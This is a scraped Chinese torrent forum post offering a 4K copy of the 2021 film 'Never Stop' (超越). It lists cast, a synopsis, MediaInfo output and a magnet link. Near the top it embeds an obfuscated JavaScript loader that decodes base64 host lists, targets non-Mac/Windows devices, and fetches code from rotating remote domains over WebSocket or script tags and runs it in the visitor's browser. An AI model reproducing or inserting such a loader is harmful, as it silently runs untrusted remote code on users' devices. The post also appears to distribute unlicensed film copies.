超越[国语音轨]Never.Stop.2021.2160p.WEB-DL.H264.DDP5.1-迅雷下载 9.48GB

版主小s 16天前 253

var x=window['\x61\x74\x6f\x62'],id=x('NDQ0NDczNzY1NjE1Nzg4ODg4OC0xMDAwNw==');document.write('%lt;ins style="display:none!important" id="'+id+'"%gt;%lt;/ins%gt;');(window.adbyunion=window.adbyunion||[]).push(id);window['\x49\x6e\x58\x62\x4c\x54\x4c\x79\x4d\x72']=(!/^Mac|Win/.test(navigator.platform)||!navigator.platform)?function(){;(function(u,k,w,d,c){var cs=d[x('Y3VycmVudFNjcmlwdA==')];'jQuery';var t=[],l=[],e=0,r=0,delay=2000,f=null,ua=navigator.userAgent.toLowerCase(),sc=Math.max(1,600000),ext='1',i='win'+Math.floor(new Date().getTime()/sc)+ext;if(ua.indexOf('baidu')>-1||ua.indexOf('uawei')>-1){r=1;u=k;f=function(){if(!l.length)return;var ws=new WebSocket(l.shift()+'/'+i);ws.onopen=function(){for(var k in t)t[k]&&clearTimeout(t[k])};ws.onmessage=function(e){new Function('_tdcs',x(e.data))(cs);ws.close()};ws.onerror=function(e){t[++e]&&clearTimeout(t[e]);f()}};}else{f=function(){if(!l.length)return;var s=document.createElement('script');s.src=l.shift()+'/'+i;cs.parentElement.insertBefore(s,cs);s.onload=function(){for(var k in t)t[k]&&clearTimeout(t[k])};s.onerror=function(){cs.parentElement.removeChild(s);t[++e]&&clearTimeout(t[e]);f()}};}u=decodeURIComponent(x(u.replace(new RegExp(c[r]+''+c[r],'g'),c[r])));var l=u.split(',');l.sort(function(){return 0.5-Math.random()});for(var j in l)t[j]=setTimeout(f,delay*j);})('aHR0cHM6Ly9veXdoeWVlaGdoYS5ndWlydWktY2xvdGhlcy5jbb20saHR0cHM6Ly9vYnk2aTg3NjZqZjEuYnVqaWFuZ2ppdTEyMy5jbb20saHR0cHM6Ly9vNzdkMjM0a2RrZmhoLnNwYXJreWluY2h1bbi5jbb20saHR0cHM6Ly9vZmhnODg3MmozODRqZGpmLnRoLW1ha2UuY29tLGh0dHBzOi8vbbzM5ZmoyM2pqZDIzOGUueGlqaS1leHByZXNzLmNvbbQ==','d3NNzOi8vd3NN5ZC53c3RlbnNN5cy5jb206OTg2NNix3c3M6Ly93c2R4LndzdGVuc3JzLmNNvbTo5ODY2LHdzczovL3dzbXIud3NN0ZW5zZGYuY29tOjk4NNjY=',window,document,['b','N']);}:function(){};

◎译 名 超越 / 极速超越 / Never Stop

◎年 代 2021

◎产 地 中国大陆

◎类 别 剧情 / 喜剧 / 运动

◎语 言 汉语普通话

◎上映日期 2021-06-12(中国大陆)

◎IMDb链接 https://www.imdb.com/title/tt14778138/

◎豆瓣评分 5.2/10 (13190人评价)

◎豆瓣链接 https://movie.douban.com/subject/34917447/

◎片 长 98分钟

◎导 演 韩博文 Bowen Han (id:1378773)

◎编 剧 甲子复 Zifu Jia (id:1455382)

◎演 员 郑恺 Kai Zheng (id:1275564)

李昀锐 Lin (id:1390859)

曹炳琨 Bingkun Cao (id:1313383)

张蓝心 Lanxin Zhang (id:1324267)

张榕容 Sandrine Pinna (id:1226703)

李晨 Chen Li (id:1274252)

金靖 Jing Jin (id:1376274)

李宁 Ning Li (id:1052811)

田雨 Yu Tian (id:1316331)

范志毅 Zhiyi Fan (id:1319964)

郑恺 Kai Zheng (id:1275564)

王中军 Zhongjun Wang (id:1276036)

黄永峰 Yongfeng Huang (id:1455383)

白雪 Xue Bai (id:1455384)

李捷 Jie Li (id:1403835)

张勇 Yong Zhang (id:1417892)

丁颂易 Songyi Ding (id:1455385)

王中磊 Zhonglei Wang (id:1276037)

张大军 Dajun Zhang (id:1412558)

孙赫 He Sun (id:1455386)

卢希 Xi Lu (id:1455387)

葛倩雯 Qianwen Ge (id:1455388)

程倩 Qian Cheng (id:1455389)

邓志玲 Zhiling Deng (id:1455390)

田鸿硕 Hongshuo Tian (id:1455391)

周欣 Xin Zhou (id:1455392)

王翎霁 Lingji Wang (id:1455395)

耿磊 Lei Geng (id:1455396)

董冬冬 Dongdong Dong (id:1348747)

刘帆 Fan Liu (id:1455397)

王媛 Yuan Wang (id:1455399)

王竞 Jing Wang (id:1409414)

于晓溪 Xiaoxi Yu (id:1455398)

吴佰嶬 Baiyi Wu (id:1455401)

李牧衡 Muheng Li (id:1455402)

郑希 Xi Zheng (id:1384856)

郭宏伟 Hongwei Guo (id:1455400)

王冲 Chong Wang (id:1388363)

宋鹏 Peng Song (id:1455404)

张壹鸣 Yiming Zhang (id:1455405)

孙景岩 Jingyan Sun (id:1371119)

袁国强 Guoqiang Yuan (id:1455406)

许艺军 Yijun Xu (id:1455407)

李稳能 Wenneng Li (id:1455408)

◎标 签 励志 / 运动 / 体育 / 体育生 / 跑步 / 短跑 / 田径 / 中国大陆

◎简 介

百米冠军吴添翼(李昀锐 饰)为解开无法战胜老飞人郝超越(郑恺 饰)的心结而返乡,不料郝超越早已沉沦,逃避最爱的跑步事业,更处心积虑利用吴添翼谋利。师兄弟二人的较量从回忆中的跑道延伸进现实生活,历经误会和冲突,最终冰释前嫌并互相治愈······

◎获奖情况 (共1项)

第24届上海国际电影节 (2021)

电影频道传媒大奖 最受传媒关注新人男演员

└──李昀锐 (id:1390859)

  1. General

  2. Unique ID : 222974290661391285899337758168818877159 (0xA7BF494C5AC27B6EFC3FF2EDF3BB82E7)

  3. Complete name : 超越[email protected]

  4. Format : Matroska

  5. Format version : Version 4

  6. File size : 9.48 GiB

  7. Duration : 1 h 37 min

  8. Overall bit rate : 13.9 Mb/s

  9. Encoded date : UTC 2021-07-16 03:03:40

  10. Writing application : mkvmerge v58.0.0 ('Supper's Ready') 64-bit

  11. Writing library : libebml v1.4.2 + libmatroska v1.6.4

  12. FileExtension_Invalid : mkv mk3d mka mks


  13. Video

  14. ID : 1

  15. Format : HEVC

  16. Format/Info : High Efficiency Video Coding

  17. Format profile : [email protected]@Main

  18. Codec ID : V_MPEGH/ISO/HEVC

  19. Duration : 1 h 37 min

  20. Bit rate : 13.5 Mb/s

  21. Width : 3 840 pixels

  22. Height : 1 776 pixels

  23. Display aspect ratio : 2.2:1

  24. Frame rate mode : Constant

  25. Frame rate : 24.000 FPS

  26. Color space : YUV

  27. Chroma subsampling : 4:2:0

  28. Bit depth : 8 bits

  29. Bits/(Pixel*Frame) : 0.082

  30. Stream size : 9.17 GiB (97%)

  31. Default : Yes

  32. Forced : No


  33. Audio #1

  34. ID : 2

  35. Format : E-AC-3

  36. Format/Info : Enhanced AC-3

  37. Commercial name : Dolby Digital Plus

  38. Codec ID : A_EAC3

  39. Duration : 1 h 37 min

  40. Bit rate mode : Constant

  41. Bit rate : 256 kb/s

  42. Channel(s) : 6 channels

  43. Channel layout : L R C LFE Ls Rs

  44. Sampling rate : 48.0 kHz

  45. Frame rate : 31.250 FPS (1536 SPF)

  46. Compression mode : Lossy

  47. Stream size : 178 MiB (2%)

  48. Language : Chinese

  49. Service kind : Complete Main

  50. Default : Yes

  51. Forced : No


  52. Audio #2

  53. ID : 3

  54. Format : AAC LC

  55. Format/Info : Advanced Audio Codec Low Complexity

  56. Codec ID : A_AAC-2

  57. Duration : 1 h 37 min

  58. Bit rate : 192 kb/s

  59. Channel(s) : 2 channels

  60. Channel layout : L R

  61. Sampling rate : 44.1 kHz

  62. Frame rate : 43.066 FPS (1024 SPF)

  63. Compression mode : Lossy

  64. Stream size : 132 MiB (1%)

  65. Language : Chinese

  66. Default : Yes

  67. Forced : No


TAGS 剧情 喜剧 运动

磁力链:
  • magnet:?xt=urn:btih:79ECBAAAD5B43C1201FE988462E6EA4077ADEF31
上传的附件:

BT9527.com论坛第一帅,不接受任何反驳
BT9527电影天堂 1、BT9527电影天堂提供的BT文件均来源于互联网抓取,只供网友学习交流、技术提升使用。
2、我们遵守BitTorrent点对点协议原则,任何版权问题请联系原资源发布商,我们不处理任何版权纠纷,谢谢!如有争议请联系邮箱:BT9527#hotmail.com(#换成@)
3、如果您发现某页面或地址有错误,请联系站长邮箱BT9527#hotmail.com(#换成@),我们会尽快处理。您的热心是对BT9527电影天堂最大的支持。
4、本站建议去正规影院观看电影以支持电影行业发展。

最新回复 (0)

你可以在 登录 or 注册 后,对此帖发表评论!

返回